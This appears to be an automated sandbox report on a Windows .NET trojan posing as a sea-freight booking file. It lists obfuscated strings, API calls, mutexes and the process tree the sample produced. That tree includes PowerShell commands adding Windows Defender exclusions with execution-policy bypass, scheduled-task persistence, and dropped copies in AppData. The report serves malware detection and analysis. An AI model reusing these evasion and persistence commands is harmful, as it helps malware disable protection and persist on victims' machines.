Source: 11.2.BhTdjGetAH.exe.2878b80.0.raw.unpack, yiyhCCrWBmInfG0a4QCNZtpE2fZz.cs	Base64 encoded string: 'lSXrhVajXFbEWoQVRTEqxDHpEXPMcLtYdlNxLHUVcnPh5HA8iQPpWfS55xqhkKbNlX1OkzpgMozx9krFhTw9iwGJIoE1IZ2y', 'Y1MOWbSIwsQFsk6Lb3f7KGug0tskQtL9qXizQeQ7RA3TZDsp3pUIxfiIitu75Z6gxuIN46raAZogiPaxZFe1csKsHbtLG4SO'
Source: 11.2.BhTdjGetAH.exe.2878b80.0.raw.unpack, MlxLECNQtbM4TD0SojWWFbuDHHiNyqDVt465RvhnIx6GdJ6aaAAsRiQRV8vdL7OvMDJexxo5Ow54v8cX7zqQKT.cs	Base64 encoded string: 'hCpqCsXGdaTKHVckUTmhc9kJuWCZQRqHEz034dhCu4zmXFd16KsjcJYMKamy7Rft'
Source: 11.2.BhTdjGetAH.exe.2878b80.0.raw.unpack, AwEg9KwvdcsSNSTrrziGMrveBN1p.cs	Base64 encoded string: 'woNHpHGmMwsIKEw8ntBHKVHMhgWt0IXHmDRuldTtE1IY29APaKSBj3tt3vhKc4P7', 'SZZKT3ZI0GkfL2iAzaAIY56PUEnPP34j3knTr6UXpDeJ8PE3Nrxc04Yr9rvkIbhU'
Source: 11.2.BhTdjGetAH.exe.2878b80.0.raw.unpack, UZUv4Eo6zQhbxPiCqZPo3OnZwa02.cs	Base64 encoded string: 'GbnSte7UnD1dvquteW4lli16wRYkhufDz0HFxZAO57ZxLbKwJwhteyRiVHkz5OPplyHSYBI1pMJ2bg1bQsDscAGOdU5BXhm2', 'IQmCUlmrVabVchmitrwHYEqhjhEBPupNZBABZHHamCWHZxjZL9DtFqy5EvRllDKA62Ca72h2wxnuVK26CQ8WEaLNzlWvlJoN', 'Qz8K2Ku7fNSV9ARr09HTwaYJRaB4k09kaeFSC4oyqn3Y5oJQxVxkLk4NKjjboSa6hcqCNhwAax1i6Kxabuc26jJW9GkTpk76', 'HsBMl0O4B3Po0QfGFQt7VMpCQc8eOh3DfMLJsXpDHr3Oq1HrBTOm5mvypsZwMsrjftcH46DbCbxmlTa1lSTGEfA1zIPHxWL0', 'lby38UhbIih3cyseFESJFZIKOZLT1pSgyQscTRatCbz9fmilgpzhSacInKhkHpGjit7KCWu4AuRPNQFfwkzrfrFZEbs9m5cp', 'mTrGfa7c1ILSIYHRdRT0oxUuP2LhOEbt2JmT01hXlSSpAScubVxNgz3WA2hZ82VPjWPe8uDzGKjbI497tZP51R5BO3k4ioux', 'Jr76SJ0aVIfGTUYUDh5k8xCOn3lX5d85aGNZ8QkGWWya3z5GLeYXmXYDQTV7iqiUXeFLhwUCo4ZI5LDoPSHfXusAxbEo8old', 'lGIIkWu5VZ4lZoN9VE5L3BpNYKrQJnGl7KUraq9hD6jtevDzFNBsNaSlWSvKvIgHLchV9tP9Dx6uWpQVg035lKVTlR1DA8au', 'yc4TDGZ1oVJhiembMwlhvuInenZcFJFty5N9Vu2t9ZekWoaC9ggEfBFCI7sgQBulRyrit0Y5k10a2ya8n4QvGpQhL27F4ghL', 'xAc6fMXprV2rbR7NoiGOyVwZgFq0f8J0MbFehJ7GjR5hm8poIK5zE1X0Kqg9Eg4BMo5rX5bgyzTd5dPirUSxOMQBnQTEeGbJ', 'IR6v0s2ohF08HKGITgv7NwNzJELJhn1fEB49703FC6Oijgr95ofEcYTmUEoQWFBAo51RhVCNA90JuQlphCBn8EO4wt0aBe56'

Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.7ca0000.8.raw.unpack, UhRVWs4V2ZmxwggVZX.cs	Security API names: _0020.SetAccessControl
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.7ca0000.8.raw.unpack, UhRVWs4V2ZmxwggVZX.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.7ca0000.8.raw.unpack, UhRVWs4V2ZmxwggVZX.cs	Security API names: _0020.AddAccessRule
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41539e0.3.raw.unpack, UhRVWs4V2ZmxwggVZX.cs	Security API names: _0020.SetAccessControl
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41539e0.3.raw.unpack, UhRVWs4V2ZmxwggVZX.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41539e0.3.raw.unpack, UhRVWs4V2ZmxwggVZX.cs	Security API names: _0020.AddAccessRule
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.307e1ac.1.raw.unpack, lDNrZ0PpIhtkmNhtuLhViabWwcRagB8W7OumnW1em5VOXVAZufAe0j.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.307e1ac.1.raw.unpack, lDNrZ0PpIhtkmNhtuLhViabWwcRagB8W7OumnW1em5VOXVAZufAe0j.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 11.2.BhTdjGetAH.exe.288d464.1.raw.unpack, lDNrZ0PpIhtkmNhtuLhViabWwcRagB8W7OumnW1em5VOXVAZufAe0j.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 11.2.BhTdjGetAH.exe.288d464.1.raw.unpack, lDNrZ0PpIhtkmNhtuLhViabWwcRagB8W7OumnW1em5VOXVAZufAe0j.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41a9e00.4.raw.unpack, UhRVWs4V2ZmxwggVZX.cs	Security API names: _0020.SetAccessControl
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41a9e00.4.raw.unpack, UhRVWs4V2ZmxwggVZX.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41a9e00.4.raw.unpack, UhRVWs4V2ZmxwggVZX.cs	Security API names: _0020.AddAccessRule
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41539e0.3.raw.unpack, EJxCOd0IK9HWBTygqT.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.3092a90.2.raw.unpack, lDNrZ0PpIhtkmNhtuLhViabWwcRagB8W7OumnW1em5VOXVAZufAe0j.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.3092a90.2.raw.unpack, lDNrZ0PpIhtkmNhtuLhViabWwcRagB8W7OumnW1em5VOXVAZufAe0j.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.7ca0000.8.raw.unpack, EJxCOd0IK9HWBTygqT.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41a9e00.4.raw.unpack, EJxCOd0IK9HWBTygqT.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 11.2.BhTdjGetAH.exe.2878b80.0.raw.unpack, lDNrZ0PpIhtkmNhtuLhViabWwcRagB8W7OumnW1em5VOXVAZufAe0j.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 11.2.BhTdjGetAH.exe.2878b80.0.raw.unpack, lDNrZ0PpIhtkmNhtuLhViabWwcRagB8W7OumnW1em5VOXVAZufAe0j.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.evad.winEXE@44/37@4/1

Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe

File created: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7956:120:WilError_03
Source: C:\Users\user\AppData\Local\XClient.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7740:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8016:120:WilError_03
Source: C:\Users\user\AppData\Local\XClient.exe	Mutant created: \Sessions\1\BaseNamedObjects\bseBVoWpZznFSF
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7376:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7308:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7912:120:WilError_03
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Mutant created: \Sessions\1\BaseNamedObjects\fl41tVl0YQYHBwgA
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8092:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2740:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7244:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7468:120:WilError_03

Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe

File created: C:\Users\user\AppData\Local\Temp\tmp378C.tmp

Jump to behavior

Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe

ReversingLabs: Detection: 57%

Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe

File read: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe "C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe"
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\BhTdjGetAH.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BhTdjGetAH" /XML "C:\Users\user\AppData\Local\Temp\tmp378C.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process created: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe "C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe"
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process created: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe "C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe C:\Users\user\AppData\Roaming\BhTdjGetAH.exe
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BhTdjGetAH" /XML "C:\Users\user\AppData\Local\Temp\tmp5296.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process created: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe "C:\Users\user\AppData\Roaming\BhTdjGetAH.exe"
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\XClient.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\XClient.exe "C:\Users\user\AppData\Local\XClient.exe"
Source: C:\Users\user\AppData\Local\XClient.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BhTdjGetAH" /XML "C:\Users\user\AppData\Local\Temp\tmpDDBF.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\XClient.exe	Process created: C:\Users\user\AppData\Local\XClient.exe "C:\Users\user\AppData\Local\XClient.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\XClient.exe "C:\Users\user\AppData\Local\XClient.exe"
Source: C:\Users\user\AppData\Local\XClient.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BhTdjGetAH" /XML "C:\Users\user\AppData\Local\Temp\tmp125.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\XClient.exe	Process created: C:\Users\user\AppData\Local\XClient.exe "C:\Users\user\AppData\Local\XClient.exe"
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe"	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\BhTdjGetAH.exe"	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BhTdjGetAH" /XML "C:\Users\user\AppData\Local\Temp\tmp378C.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process created: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe "C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe"	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process created: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe "C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe"	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe'	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe'	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\XClient.exe'	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BhTdjGetAH" /XML "C:\Users\user\AppData\Local\Temp\tmp5296.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process created: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe "C:\Users\user\AppData\Roaming\BhTdjGetAH.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\XClient.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BhTdjGetAH" /XML "C:\Users\user\AppData\Local\Temp\tmpDDBF.tmp"
Source: C:\Users\user\AppData\Local\XClient.exe	Process created: C:\Users\user\AppData\Local\XClient.exe "C:\Users\user\AppData\Local\XClient.exe"
Source: C:\Users\user\AppData\Local\XClient.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BhTdjGetAH" /XML "C:\Users\user\AppData\Local\Temp\tmp125.tmp"
Source: C:\Users\user\AppData\Local\XClient.exe	Process created: C:\Users\user\AppData\Local\XClient.exe "C:\Users\user\AppData\Local\XClient.exe"

Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
